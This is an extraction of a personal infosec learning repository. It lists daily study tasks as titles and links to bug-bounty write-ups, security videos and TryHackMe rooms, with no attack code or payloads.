http://hassankhanyusufzai.com/RFI_LFI_writeup/
#infosec #learn365
================================================
FILE: Resources/Day 96 Task.md
================================================
🎯 Day 96 Task
✅ Stumbling upon a new way to exploit authorization bypass in Jira
https://blog.detectify.com/2019/01/29/hacking-isnt-an-exact-science/
#infosec #learn365
================================================
FILE: Resources/Day 97 Task.md
================================================
🎯 Day 97 Task
✅ Clickjacking on Google MyAccount Worth 7,500$
https://apapedulimu.click/clickjacking-on-google-myaccount-worth-7500/
#infosec #learn365
================================================
FILE: Resources/Day 98 Task.md
================================================
🎯 Day 98 Task
✅ Info Disclosure and SQLi Writeup
https://aaronesau.com/blog/posts/5
#infosec #learn365
================================================
FILE: Resources/Day 99 Task.md
================================================
🎯 Day 99 Task
✅ CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing
https://medium.com/@armaanpathan/chain-the-vulnerabilities-and-take-your-report-impact-on-the-moon-csrf-to-html-injection-which-608fa6e74236
#infosec #learn365 #bugbounty
Condensed preview — 146 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (149K chars).
[
{
"path": "Resources/Day 113 Task.md",
"chars": 283,
"preview": "🎯 Day 113 Task\n\n\n\n✅ Getting access to disabled/hidden features with the help of Burpsuite Match and Replace settings\n\n\nh"
},
{
"path": "Resources/Day 114 Task.md",
"chars": 284,
"preview": "🎯 Day 114 Task\n\n\n✅ Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)\n\n\nhttps"
},
{
"path": "Resources/Day 115 Task.md",
"chars": 209,
"preview": "🎯 Day 115 Task\n\n\n✅ How I chained two vulnerabilities to steal credit card details?\n\n\nhttps://www.codedbrain.com/how-i-ch"
},
{
"path": "Resources/Day 116 Task.md",
"chars": 177,
"preview": "🎯 Day 116 Task\n\n\n✅ How I Made The BBC Hall Of Fame 3 Times\n\n\nhttps://medium.com/@tobydavenn/how-i-made-the-bbc-hall-of-f"
},
{
"path": "Resources/Day 117 Task.md",
"chars": 190,
"preview": "🎯 Day 117 Task\n\n\n✅ Improper cookie not expiring after logged out!\n\n\nhttps://medium.com/@mujios101/improper-cookie-not-ex"
},
{
"path": "Resources/Day 118 Task.md",
"chars": 289,
"preview": "🎯 Day 118 Task\n\n\n✅ Open-Redirects\n\n\nhttps://medium.com/@souravgro25/open-redirects-a93b01f31868\n\n\n✅ What you doing wrong"
},
{
"path": "Resources/Day 119 Task.md",
"chars": 152,
"preview": "🎯 Day 119 Task\n\n\n✅ Bypassing WAF for $2222\n\n\nhttps://divyanshsharma2401.medium.com/bypassing-waf-for-2222-f99b80cfdb9b\n\n"
},
{
"path": "Resources/Day 12 Task.md",
"chars": 577,
"preview": "🎯 Day 12 Task\n\n\n➡️ Working on Bug bounty Wordlist tool inspired by [Kathan Patel](https://twitter.com/KathanP19)\n\n\n🔁 Try"
},
{
"path": "Resources/Day 120 Task.md",
"chars": 164,
"preview": "🎯 Day 120 Task\n\n\n✅ Subdomain Takeover using Mobile??\n\n\nhttps://0xshakhawat.medium.com/subdomain-takeover-using-mobile-da"
},
{
"path": "Resources/Day 121 Task.md",
"chars": 226,
"preview": "🎯 Day 121 Task\n\n\n✅ Fuzzing and credentials leakage..awesome bug hunting writeup\n\n\nhttps://medium.com/@abdalrahman.alsham"
},
{
"path": "Resources/Day 122 Task.md",
"chars": 172,
"preview": "🎯 Day 122 Task\n\n\n✅ OTP bypass with response manipulation.\n\n\nhttps://ertugrull.medium.com/otp-bypass-with-response-manipu"
},
{
"path": "Resources/Day 123 Task.md",
"chars": 105,
"preview": "🎯 Day 123 Task\n\n\n\nThere is no task Today Enjoy Eid Festival \n\n🥳😊😃\n\n\n\n#learn365 #eid2022 #eidmubarak2022 \n"
},
{
"path": "Resources/Day 124 Task.md",
"chars": 204,
"preview": "🎯 Day 124 Task\n\n\n✅ An Bug Bounty Hunter’s Guide to IDOR Vulnerabilities\n\n\nhttps://medium.com/@daniel.j.hunt/an-bug-bount"
},
{
"path": "Resources/Day 125 Task.md",
"chars": 194,
"preview": "🎯 Day 125 Task\n\n\n✅ How I got a lousyT-Shirt from the Dutch Government.\n\n\nhttps://maxva.medium.com/how-i-got-a-lousyt-shi"
},
{
"path": "Resources/Day 126 Task.md",
"chars": 127,
"preview": "🎯 Day 126 Task\n\n\n✅ Hack the HAckers\n\n\nhttps://raoshaab.medium.com/hack-the-hackers-7d4ffbc70858\n\n#infosec #learn365 #bug"
},
{
"path": "Resources/Day 127 Task.md",
"chars": 145,
"preview": "🎯 Day 127 Task\n\n\n✅ The $16,000 Dev Mistake\n\n\nhttps://medium.com/@masonhck357/the-16-000-dev-mistake-13e516e86be6\n\n\n#info"
},
{
"path": "Resources/Day 128 Task.md",
"chars": 151,
"preview": "🎯 Day 128 Task\n\n\n✅ Denial of Service through …\n\n\nhttps://medium.com/@sathvika03/denial-of-service-through-55368b323839\n\n"
},
{
"path": "Resources/Day 129 Task.md",
"chars": 270,
"preview": "🎯 Day 129 Task\n\n\n✅ How i found a vulnerability that leads to access any users’ sensitive data and got $500\n\n\nhttps://med"
},
{
"path": "Resources/Day 13 Task.md",
"chars": 656,
"preview": "🎯 Day 13 Task\n\n\n✅ Start Learning OWASP Web Application Security Testing \n\n\n4.1 Information Gathering \n\n\n✅ 4.1.1 Conduc"
},
{
"path": "Resources/Day 130 Task.md",
"chars": 107,
"preview": "🎯 Day 130 Task\n\n\n✅ ToolTime - Cloud Recon 1\n\n\nhttps://youtu.be/7hKEfF-yR1w\n\n\n#infosec #learn365 #bugbounty\n"
},
{
"path": "Resources/Day 131 Task.md",
"chars": 139,
"preview": "🎯 Day 131 Task\n\n\n✅ A Fun SSRF through a Headless Browser\n\n\nhttps://corben.io/fun-ssrf-via-headless-browser/\n\n#infosec #l"
},
{
"path": "Resources/Day 132 Task.md",
"chars": 157,
"preview": "🎯 Day 132 Task\n\n\n✅ 2FA Bypass in PickMyCareer.in\n\n\nhttps://jayateerthag.medium.com/2fa-bypass-in-pickmycareer-in-8abbde4"
},
{
"path": "Resources/Day 133 Task.md",
"chars": 180,
"preview": "🎯 Day 133 Task\n\n\n✅ Exploiting Google Maps API keys for profit\n\n\nhttps://infosecwriteups.com/exploiting-google-maps-api-k"
},
{
"path": "Resources/Day 134 Task.md",
"chars": 260,
"preview": "🎯 Day 134 Task\n\n\n✅ Creator Studio’s api endpoint is vulnerable to IDOR, exposes “p40_earnings_usd”:$$$\n\n\nhttps://medium."
},
{
"path": "Resources/Day 135 Task.md",
"chars": 169,
"preview": "🎯 Day 135 Task\n\n\n✅ I have 1% chance to hack this company\n\n\nhttps://infosecwriteups.com/i-have-1-chance-to-hack-this-comp"
},
{
"path": "Resources/Day 136 Task.md",
"chars": 180,
"preview": "🎯 Day 136 Task\n\n\n✅ HTTP Request Smuggling: Part-1 (Concepts)\n\n\nhttps://medium.com/nerd-for-tech/http-request-smuggling-p"
},
{
"path": "Resources/Day 137 Task.md",
"chars": 247,
"preview": "🎯 Day 137 Task\n\n\n✅ Create Your Ultimate Bug Bounty Automation Without Nerdy Bash Skills (Part 1)\n\n\nhttps://infosecwriteu"
},
{
"path": "Resources/Day 138 Task.md",
"chars": 218,
"preview": "🎯 Day 138 Task\n\n\n✅ Can analyzing javascript files lead to remote code execution?\n\n\nhttps://melotover.medium.com/can-anal"
},
{
"path": "Resources/Day 139 Task.md",
"chars": 346,
"preview": "🎯 Day 139 Task\n\n\n\n✅ My New Discovery In Oracle E-Business Login Panel That Allowed To Access For All Employees Informati"
},
{
"path": "Resources/Day 14 Task.md",
"chars": 1158,
"preview": "🎯 Day 14 Task\n\n\n✅ 4.1.2 Fingerprint Web Server\n\n\n_Objective_ \n\n\nDetermine the version and type of a running web server t"
},
{
"path": "Resources/Day 140 Task.md",
"chars": 130,
"preview": "🎯 Day 140 Task\n\n\n✅ Origin IP found, WAF Cloudflare Bypass\n\n\nhttps://hackerone.com/reports/1536299\n\n\n#infosec #learn365 #"
},
{
"path": "Resources/Day 141 Task.md",
"chars": 166,
"preview": "🎯 Day 141 Task\n\n\n✅ MFA (Multi-Factor Authentication)\n\n\nhttps://akash-venky091.medium.com/mfa-multi-factor-authentication"
},
{
"path": "Resources/Day 142 Task.md",
"chars": 275,
"preview": "🎯 Day 142 Task\n\n\n✅ Vulnerability In PayPal worth 200000$ bounty, Attacker can Steal Your Balance by One-Click\n\n\nhttps://"
},
{
"path": "Resources/Day 143 Task.md",
"chars": 166,
"preview": "🎯 Day 143 Task\n\n\n✅ Does ms15–034 still exist today ?\n\n\nhttps://medium.com/@ryuukhagetsu/does-ms15-034-still-exist-today-"
},
{
"path": "Resources/Day 144 Task.md",
"chars": 244,
"preview": "🎯 Day 144 Task\n\n\n✅ How I managed to take over any account visits my profile with Stored XSS\n\n\nhttps://0xmahmoudjo0.mediu"
},
{
"path": "Resources/Day 145 Task.md",
"chars": 160,
"preview": "🎯 Day 145 Task\n\n\n✅ The Bucket’s Got a Hole in it\n\n\nhttps://medium.com/@manikesh-singh/the-buckets-got-a-hole-in-it-343b6"
},
{
"path": "Resources/Day 15 Task.md",
"chars": 1145,
"preview": "🎯 Day 15 Task\n\n✅ 4.1.3 Review Webserver Metafiles for Information Leakage\n\nObjective \n1. Identify hidden or obfuscated p"
},
{
"path": "Resources/Day 16 Task.md",
"chars": 749,
"preview": "🎯 Day 16 Task\n\n\n✅ 4.1.4 Enumerate Applications on Webserver\n\n\nTest Objectives\n\n\nEnumerate the applications within scope "
},
{
"path": "Resources/Day 17 Task.md",
"chars": 1036,
"preview": "🎯 Day 17 Task\n\n\n✅ 4.1.5 Review Webpage Content for Information Leakage\n\n\nTest Objectives\n\n\n1. Review webpage comments, m"
},
{
"path": "Resources/Day 18 Task.md",
"chars": 2689,
"preview": "🎯 Day 18 Task\n\n\n✅ P1 Bugs WriteUp\n\n\nhttps://medium.com/@harrmahar/how-i-get-my-first-p1-sensitive-information-disclosure"
},
{
"path": "Resources/Day 19 Task.md",
"chars": 1099,
"preview": "🎯 Day 19 Task\n\n\n✅ Github Recon\n\n\nhttps://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2"
},
{
"path": "Resources/Day 20 Task.md",
"chars": 2118,
"preview": "🎯 Day 20 Task\n\n✅ Recon Techniques\n\n\nhttps://securib.ee/beelog/the-best-bug-bounty-recon-methodology/\n\n\nhttps://www.bugcr"
},
{
"path": "Resources/Day 21 Task.md",
"chars": 5440,
"preview": "🎯 Day 21 Task\n\n\n✅ 4.1.9 Fingerprint Web Application (Merged into 4.1.8)\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/histor"
},
{
"path": "Resources/Day 22 Task.md",
"chars": 989,
"preview": "🎯 Day 22 Task\n\n\n✅ 4.1.10 Map Application Architecture (Completed)\n\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/investigati"
},
{
"path": "Resources/Day 23 Task.md",
"chars": 7996,
"preview": "🎯 Day 23 Task\n\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/attacktivedirectory\n\n\n✅ 4.2.2 Test Application Platform Configu"
},
{
"path": "Resources/Day 24 Task.md",
"chars": 2846,
"preview": "🎯 Day 24 Task\n\n\n✅ THM Room \n\n\nhttps://tryhackme.com/room/vulnversity\n\n\n✅ 4.2.3 Test File Extensions Handling for Sensiti"
},
{
"path": "Resources/Day 25 Task.md",
"chars": 5265,
"preview": "🎯 Day 25 Task\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/principlesofsecurity\n\n\n✅ 4.2.4 Review Old Backup and Unreferenced"
},
{
"path": "Resources/Day 26 Task.md",
"chars": 3887,
"preview": "🎯 Day 26 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/linuxfundamentalspart2\n\n\n✅ 4.2.5 Enumerate Infrastructure and Ap"
},
{
"path": "Resources/Day 27 Task.md",
"chars": 6261,
"preview": "🎯 Day 27 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/activerecon\n\n\n✅ Web App Pentesting - HTTP Headers & Methods Vide"
},
{
"path": "Resources/Day 28 Task.md",
"chars": 2215,
"preview": "🎯 Day 28 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/walkinganapplication\n\n\n✅ 4.2.7 Test HTTP Strict Transport Securi"
},
{
"path": "Resources/Day 29 Task.md",
"chars": 3612,
"preview": "🎯 Day 29 Task\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/sqlinjectionlm\n\n\n✅ 4.2.8 Test RIA Cross Domain Policy\n\n\nTest Obje"
},
{
"path": "Resources/Day 30 Task.md",
"chars": 1234,
"preview": "🎯 Day 30 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/windowsfundamentals2x0x\n\n\n✅ 4.2.9 Test File Permission\n\n\nTest Ob"
},
{
"path": "Resources/Day 31 Task.md",
"chars": 2947,
"preview": "🎯 Day 31 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/burpsuitebasics\n\n\n✅ 4.2.10 Test for Subdomain Takeover\n\n\n✅ https"
},
{
"path": "Resources/Day 32 Task.md",
"chars": 4103,
"preview": "🎯 Day 32 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/burpsuiterepeater\n\n---------------------------------------------"
},
{
"path": "Resources/Day 33 Task.md",
"chars": 2810,
"preview": "🎯 Day 33 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/picklerick\n\n\n---------------------------------------------------"
},
{
"path": "Resources/Day 34 Task.md",
"chars": 3006,
"preview": "🎯 Day 34 Task\n\n\n🔃 THM Room - Linux PrivEsc\n\n\nT 11 - Privilege Escalation: NFS\n\n\nhttps://tryhackme.com/room/linprivesc\n\n\n"
},
{
"path": "Resources/Day 35 Task.md",
"chars": 2005,
"preview": "🎯 Day 35 Task\n\n✅ eJPT\n\n🔃 Networking (4)\n\n\nLink Layer Devices & Protocols - Study Guide\n\n--------------------------------"
},
{
"path": "Resources/Day 36 Task.md",
"chars": 1596,
"preview": "🎯 Day 36 Task\n\n\n✅ 4.3.3 Test Account Provisioning Process\n\n\nTest Objectives - Verify which accounts may provision other "
},
{
"path": "Resources/Day 37 Task.md",
"chars": 6503,
"preview": "🎯 Day 37 Task\n\n\n✅ 4.3.4 Testing for Account Enumeration and Guessable User Account\n\n\nTest Objectives\n\n1. Review processe"
},
{
"path": "Resources/Day 38 Task.md",
"chars": 909,
"preview": "🎯 Day 38 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/sudovulnsbypass\n\n\n✅ 4.3.5 Testing for Weak or Unenforced Usernam"
},
{
"path": "Resources/Day 39 Task.md",
"chars": 4285,
"preview": "🎯 Day 39 Task\n\n\n✅ 4.4.1 Testing for Credentials Transported over an Encrypted Channel\n\n\nTest Objectives\n\n\n1. Identify se"
},
{
"path": "Resources/Day 40 Task.md",
"chars": 2422,
"preview": "🎯 Day 40 Task\n\n\n✅ 4.4.2 Testing for Default Credentials\n\n\nTest Objectives\n\n1. Determine whether the application has any "
},
{
"path": "Resources/Day 41 Task.md",
"chars": 150,
"preview": "🎯 Day 41 Task\n\n\n\nCSRF\n\n\nhttps://medium.com/@chiragrai3666/csrf-today-techniques-mitigations-and-bypasses-continued-45879"
},
{
"path": "Resources/Day 42 Task.md",
"chars": 85,
"preview": "🎯 Day 42 Task\n\n\n✅ Open Redirect \n\n\nhttps://youtu.be/dz052doAJSE\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 43 Task.md",
"chars": 107,
"preview": "🎯 Day 43 Task\n\n\n✅ Log4j\n\n\nhttps://youtu.be/lKPUCkPTcJA\n\n\nhttps://youtu.be/Z70B3fYQUNs\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 44 Task.md",
"chars": 143,
"preview": "🎯 Day 44 Task\n\n\nJWT Attacking JSON Web Tokens\n\n\n✅ https://infosecwriteups.com/attacking-json-web-tokens-jwts-d1d51a1e17c"
},
{
"path": "Resources/Day 45 Task.md",
"chars": 88,
"preview": "🎯 Day 45 Task\n\n\n✅ Content Discovery\n\n\nhttps://youtu.be/fGlzDi3hwlU\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 46 Task.md",
"chars": 168,
"preview": "🎯 Day 46 Task\n\n\n✅ Idor\n\n\nhttps://medium.com/@aysebilgegunduz/everything-you-need-to-know-about-idor-insecure-direct-obje"
},
{
"path": "Resources/Day 47 Task.md",
"chars": 139,
"preview": "🎯 Day 47 Task\n\n\n✅ Account Takeover\n\n\nhttps://medium.com/techiepedia/p5-to-p1-intresting-account-takeover-6e59b879494b\n\n\n"
},
{
"path": "Resources/Day 48 Task.md",
"chars": 156,
"preview": "🎯 Day 48 Task\n\n\n✅ RCE on a Java Web Application\n\nhttps://infosecwriteups.com/the-story-of-a-rce-on-a-java-web-applicatio"
},
{
"path": "Resources/Day 49 Task.md",
"chars": 146,
"preview": "🎯 Day 49 Task\n\n\n✅ Dependency Confusion\n\nhttps://hetroublemakr.medium.com/how-i-approached-dependency-confusion-272b46f66"
},
{
"path": "Resources/Day 50 Task.md",
"chars": 139,
"preview": "🎯 Day 50 Task\n\n\n✅ Automate Blind XSS\n\n\nhttps://securityonline.info/blind-xss-search/\n\n\nhttps://youtu.be/GcznQUsNW3s\n\n\n\n#"
},
{
"path": "Resources/Day 51 Task.md",
"chars": 198,
"preview": "🎯 Day 51 Task\n\n\n✅ Finding And Exploiting S3 Amazon Buckets For Bug Bounties\n\n\nhttps://infosecwriteups.com/finding-and-ex"
},
{
"path": "Resources/Day 52 Task.md",
"chars": 144,
"preview": "🎯 Day 52 Task\n\n\n✅ Web Cache Poisioning attack\n\n\nhttps://gupta-bless.medium.com/exploiting-web-cache-poisoning-e3a6b9df15"
},
{
"path": "Resources/Day 53 Task.md",
"chars": 168,
"preview": "🎯 Day 53 Task\n\n\n✅ Unique Case for Price Manipulation \n\n\nhttps://infosecwriteups.com/unique-case-for-price-manipulation-b"
},
{
"path": "Resources/Day 54 Task.md",
"chars": 214,
"preview": "🎯 Day 54 Task\n\n\n✅ Account takeover via the Password Reset Functionality.\n\n\nhttps://infosecwriteups.com/how-i-was-able-to"
},
{
"path": "Resources/Day 55 Task.md",
"chars": 215,
"preview": "🎯 Day 55 Task\n\n\n✅ THM Room\n\n\nhttps://tryhackme.com/room/ohsint\n\n\n✅ API Token Hijacking Through Clickjacking\n\n\nhttps://in"
},
{
"path": "Resources/Day 56 Task.md",
"chars": 158,
"preview": "🎯 Day 56 Task\n\n\n✅ API Exploitation →Business Logic Bug\n\n\nhttps://medium.com/techiepedia/api-exploitation-business-logic-"
},
{
"path": "Resources/Day 57 Task.md",
"chars": 237,
"preview": "🎯 Day 57 Task\n\n\n✅ Attended [Infosec Conference](https://twitter.com/InfoSecComm) on : Android Static Analysis \n\n\nhttps:"
},
{
"path": "Resources/Day 58 Task.md",
"chars": 96,
"preview": "🎯 Day 58 Task\n\n\n✅ Finding bugs on NFT website for fun & Profit by @zseano \n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 59 Task.md",
"chars": 269,
"preview": "🎯 Day 59 Task\n\n\n✅ EXIF Geolocation Data Not Stripped From Uploaded Images\n\n\nhttps://medium.com/@souravnewatia/exif-geolo"
},
{
"path": "Resources/Day 60 Task.md",
"chars": 147,
"preview": "🎯 Day 60 Task\n\n\n✅ Thick Client Pentesting \n\n\nhttps://payatu.com/blog/farid/Thick-Client-Basic\n\n\nhttps://youtu.be/dC9M4ha"
},
{
"path": "Resources/Day 61 Task.md",
"chars": 120,
"preview": "🎯 Day 61 Task\n\n\n✅ Conduct a Penetration Test Like a Pro in 6 Phases\n\n\nhttps://youtu.be/8a1yTN2kFNw\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 62 Task.md",
"chars": 130,
"preview": "🎯 Day 62 Task\n\n\n✅ Firewall Penetration Testing\n\n\nhttps://youtu.be/0Izu0J6iSoM\n\n\nhttps://youtu.be/ocekT9Llep0\n\n\n#infosec "
},
{
"path": "Resources/Day 63 Task.md",
"chars": 122,
"preview": "🎯 Day 63 Task\n\n\n✅ Host Discovery & Vulnerability Scanning With Nessus\n\n\nhttps://youtu.be/TA1rCRyHRsM\n\n\n#infosec #learn36"
},
{
"path": "Resources/Day 64 Task.md",
"chars": 135,
"preview": "🎯 Day 64 Task\n\n\n✅ AWS Web Application Firewall (WAF)\n\n\nhttps://youtu.be/udug43AWeJw\n\n\n✅ 5 Exercise Pentesterlabs \n\n\n#inf"
},
{
"path": "Resources/Day 65 Task.md",
"chars": 141,
"preview": "🎯 Day 65 Task\n\n\n✅ Introduction To Pentesting - Enumeration\n\n\nhttps://youtu.be/WvSEkPU1n0I\n\n\n✅ 6 Exercise Pentesterlabs \n"
},
{
"path": "Resources/Day 66 Task.md",
"chars": 280,
"preview": "🎯 Day 66 Task\n\n\n✅ Bypassing CSRF Protection\n\n\nhttps://medium.com/swlh/bypassing-csrf-protection-c9b217175ee\n\n\nhttps://me"
},
{
"path": "Resources/Day 67 Task.md",
"chars": 238,
"preview": "🎯 Day 67 Task\n\n\n✅ HTML Injection\n\n\nhttps://medium.com/@chaitanyarajhans024/simple-html-injection-to-250-895b760409ed\n\n\nh"
},
{
"path": "Resources/Day 68 Task.md",
"chars": 192,
"preview": "🎯 Day 68 Task\n\n\n✅ Exploiting SQL Injection\n\n\nhttps://medium.com/sud0root/bug-bounty-writeups-exploiting-sql-injection-vu"
},
{
"path": "Resources/Day 69 Task.md",
"chars": 225,
"preview": "🎯 Day 69 Task\n\n\n✅ A Weird Price Tampering Vulnerability\n\n\nhttps://medium.com/@vflexo/a-weird-price-tampering-vulnerabili"
},
{
"path": "Resources/Day 70 Task.md",
"chars": 194,
"preview": "🎯 Day 70 Task\n\n\n✅ A Summary of OAuth 2.0 Attack Methods\n\n\nhttps://medium.com/@TutorialBoy24/a-summary-of-oauth-2-0-attac"
},
{
"path": "Resources/Day 71 Task.md",
"chars": 284,
"preview": "🎯 Day 71 Task\n\n\n✅ Bypassing CSRF Protection\n\n\nhttps://medium.com/swlh/bypassing-csrf-protection-c9b217175ee\n\n\n✅ 6 Method"
},
{
"path": "Resources/Day 72 Task.md",
"chars": 212,
"preview": "🎯 Day 72 Task\n\n\n✅ Two-factor authentication security testing and possible bypasses\n\n\nhttps://medium.com/@iSecMax/two-fac"
},
{
"path": "Resources/Day 73 Task.md",
"chars": 278,
"preview": "🎯 Day 73 Task\n\n\n✅ 10 Types of Web Vulnerabilities that are Often Missed\n\n\nhttps://labs.detectify.com/2021/09/30/10-types"
},
{
"path": "Resources/Day 74 Task.md",
"chars": 214,
"preview": "🎯 Day 74 Task\n\n\n✅ My First Bug Bounty: SQL Injection\n\n\nhttps://infosecwriteups.com/first-bug-bounty-ever-sql-injection-d"
},
{
"path": "Resources/Day 75 Task.md",
"chars": 273,
"preview": "🎯 Day 75 Task\n\n\n✅ Dank Writeup On Broken Access Control\n\n\nhttps://infosecwriteups.com/dank-writeup-on-broken-access-cont"
},
{
"path": "Resources/Day 76 Task.md",
"chars": 250,
"preview": "🎯 Day 76 Task\n\n\n✅ SSRF in PDF Renderer using SVG\n\n\nhttps://pwn.vg/articles/2021-05/ssrf-in-pdf-renderer-using-svg\n\n✅ Byp"
},
{
"path": "Resources/Day 77 Task.md",
"chars": 219,
"preview": "🎯 Day 77 Task\n\n\n✅ Easy IDOR hunting with Autorize?\n\n\nhttps://youtu.be/2WzqH6N-Gbc\n\n\n✅ HOW I hacked thousand of subdomain"
},
{
"path": "Resources/Day 78 Task.md",
"chars": 234,
"preview": "🎯 Day 78 Task\n\n\n✅ A business logic error bug worth 600$\n\n\nhttps://itsdeepceh.medium.com/a-business-logic-error-bug-worth"
},
{
"path": "Resources/Day 79 Task.md",
"chars": 342,
"preview": "🎯 Day 79 Task\n\n\n✅ How to find IDOR | Privilege escalation | weak authorization | Broken access control | Burp Autorize\n\n"
},
{
"path": "Resources/Day 80 Task.md",
"chars": 313,
"preview": "🎯 Day 80 Task\n\n\n✅ Account Takeover via Web Cache Poisoning based Reflected XSS\n\n\nhttps://lutfumertceylan.com.tr/posts/ac"
},
{
"path": "Resources/Day 81 Task.md",
"chars": 249,
"preview": "🎯 Day 81 Task\n\n\n✅ Account Takeover: From zero to System Admin using basic skills\n\n\nhttps://youtu.be/t6-SXKIun8s\n\n\n✅ Apac"
},
{
"path": "Resources/Day 82 Task.md",
"chars": 287,
"preview": "🎯 Day 82 Task\n\n\n✅ The easiest $2500 I got it from bug bounty program\n\n\nhttps://3bodymo.medium.com/the-easiest-2500-i-got"
},
{
"path": "Resources/Day 83 Task.md",
"chars": 273,
"preview": "🎯 Day 83 Task\n\n\n✅ How I bypassed disable_functions in php to get a remote shell\n\n\nhttps://infosecwriteups.com/how-i-bypa"
},
{
"path": "Resources/Day 84 Task.md",
"chars": 200,
"preview": "🎯 Day 84 Task\n\n\n✅ Finding Your Next Bug: GraphQL\n\nhttps://youtu.be/jyjGneKJynk\n\n\n✅ No Rate Limit - 2K$ Bounty\n\n\nhttps://"
},
{
"path": "Resources/Day 85 Task.md",
"chars": 299,
"preview": "🎯 Day 85 Task\n\n\n✅ Facebook email disclosure and account takeover\n\n\nhttps://medium.com/pentesternepal/facebook-email-disc"
},
{
"path": "Resources/Day 86 Task.md",
"chars": 236,
"preview": "🎯 Day 86 Task\n\n\n✅ Hacking banks with race conditions\n\n\nhttps://youtu.be/QtV3Qc-bY1s\n\n\n✅ Exploiting a Race Condition Vuln"
},
{
"path": "Resources/Day 87 Task.md",
"chars": 396,
"preview": "🎯 Day 87 Task\n\n\n✅ A Comprehensive Guide to Broken Access Control\n\n\nhttps://medium.com/purplebox/broken-access-control-f8"
},
{
"path": "Resources/Day 88 Task.md",
"chars": 282,
"preview": "🎯 Day 88 Task\n\n\n✅ A Journey from IDOR to Account Takeover\n\n\nhttps://payatu.com/blog/arjuns/A-Journey-IDOR-to-Account-Tak"
},
{
"path": "Resources/Day 89 Task.md",
"chars": 277,
"preview": "🎯 Day 89 Task\n\n\n✅ Union Based SQL Injection — Bug Hunting\n\n\nhttps://eslam3kl.medium.com/sql-injection-at-spotify-d19e086"
},
{
"path": "Resources/Day 90 Task.md",
"chars": 289,
"preview": "🎯 Day 90 Task\n\n\n✅ Exploiting cross-site scripting in Referer header\n\n\nhttps://www.gremwell.com/exploiting_xss_in_referer"
},
{
"path": "Resources/Day 91 Task.md",
"chars": 315,
"preview": "🎯 Day 91 Task\n\n\n✅ How I bypassed 403 forbidden domain using a simple trick\n\n\nhttps://janmuhammadzaidi.medium.com/how-i-b"
},
{
"path": "Resources/Day 92 Task.md",
"chars": 353,
"preview": "🎯 Day 92 Task\n\n\n✅ Bypassing SSRF Protection to Exfiltrate AWS Metadata from LarkSuite\n\n\nhttps://sirleeroyjenkins.medium."
},
{
"path": "Resources/Day 93 Task.md",
"chars": 143,
"preview": "🎯 Day 93 Task\n\n\n✅ 0-day Cross Origin Request Forgery vulnerability in Grafana 8.x\n\n\nhttps://hackerone.com/reports/145823"
},
{
"path": "Resources/Day 94 Task.md",
"chars": 205,
"preview": "🎯 Day 94 Task\n\n\n✅ GOT ACCESS TO DOTA 2 ADMIN PANEL BY EXPLOITING IN-GAME FEATURE\n\n\nhttps://abdilahrf.github.io/bugbounty"
},
{
"path": "Resources/Day 95 Task.md",
"chars": 117,
"preview": "🎯 Day 95 Task\n\n\n✅ How I escalated RFI into LFI\n\n\nhttp://hassankhanyusufzai.com/RFI_LFI_writeup/\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 96 Task.md",
"chars": 174,
"preview": "🎯 Day 96 Task\n\n\n✅ Stumbling upon a new way to exploit authorization bypass in Jira\n\n\nhttps://blog.detectify.com/2019/01/"
},
{
"path": "Resources/Day 97 Task.md",
"chars": 158,
"preview": "🎯 Day 97 Task\n\n\n✅ Clickjacking on Google MyAccount Worth 7,500$\n\n\nhttps://apapedulimu.click/clickjacking-on-google-myacc"
},
{
"path": "Resources/Day 98 Task.md",
"chars": 109,
"preview": "🎯 Day 98 Task\n\n\n✅ Info Disclosure and SQLi Writeup\n\n\nhttps://aaronesau.com/blog/posts/5\n\n\n#infosec #learn365\n"
},
{
"path": "Resources/Day 99 Task.md",
"chars": 259,
"preview": "🎯 Day 99 Task\n\n\n✅ CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing\n\n\nhttps://medium.com/@armaanpathan/c"
}
]
About this extraction
This page contains the full source code of the Imran407704/Learn365 GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 146 files (132.1 KB), approximately 37.9k tokens.
Extracted by GitExtract.